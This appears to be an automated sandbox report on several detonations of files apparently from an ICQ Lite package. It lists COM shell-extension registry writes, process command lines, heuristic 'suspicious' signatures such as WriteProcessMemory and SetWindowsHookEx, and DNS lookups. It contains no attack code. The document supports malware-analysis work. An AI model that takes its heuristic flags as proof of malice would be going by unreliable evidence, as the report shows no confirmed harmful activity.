memory/2176-27-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-28-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-29-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-30-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-31-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-32-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-33-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-34-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-35-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-36-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-37-0x0000000140000000-0x0000000140C54000-memory.dmp
memory/2176-38-0x00007FFDB3130000-0x00007FFDB33F9000-memory.dmp
memory/2176-39-0x00007FFDB5410000-0x00007FFDB5605000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
115s
Max time network
168s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3844919115-497234255-166257750-1000_Classes\WOW6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32\ = "{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\ProgID\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\ = "ICQLiteShell 1.0 Type Library" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 5008 wrote to memory of 4800 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\ICQLiteShell.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
111s
Max time network
168s
Command Line
Signatures
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
119s
Max time network
134s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2332 wrote to memory of 2200 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\LiteRes.dll,#1
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:03
Platform
win10v2004-20240221-en
Max time kernel
115s
Max time network
168s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4064 wrote to memory of 2584 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\ICQRT.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2584 -ip 2584
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 600
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
123s
Max time network
135s
Command Line
Signatures
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe
"C:\Users\Admin\AppData\Local\Temp\Language\WinRar.exe"
Network
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win10v2004-20240221-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\bentonite.png
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.78.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-02-23 08:58
Reported
2024-02-23 09:02
Platform
win7-20240221-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ProxyStubClsid32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\NumMethods\ = "3" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3B2B86E2-601D-41A5-8FAB-CEBB3342EE8F}\ = "IMCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\TypeLib\ = "{346F8AC1-CEB1-4E3E-944B-87D9840505C3}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "MIBLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CLSID\ = "{73B24247-042E-4EF5-ADC2-42F62E6FD654}" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\ = "PSFactoryBuffer" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt.1\CLSID | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods\ = "7" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32 | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ICQLiteMenu | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{346F8AC1-CEB1-4E3E-944B-87D9840505C3}\1.0\FLAGS\ = "0" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\ = "MCLiteShellExt Class" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\VersionIndependentProgID\ = "ICQLiteShell.MCLiteShellExt" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{73B24247-042E-4EF5-ADC2-42F62E6FD654}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ICQLiteShell.dll" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\InProcServer32\ThreadingModel = "Both" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{50DF956F-CA2B-4616-83DE-4BB3AD8CF4E2}\NumMethods | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\ICQLiteShell.MCLiteShellExt\CurVer\ = "ICQLiteShell.MCLiteShellExt.1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
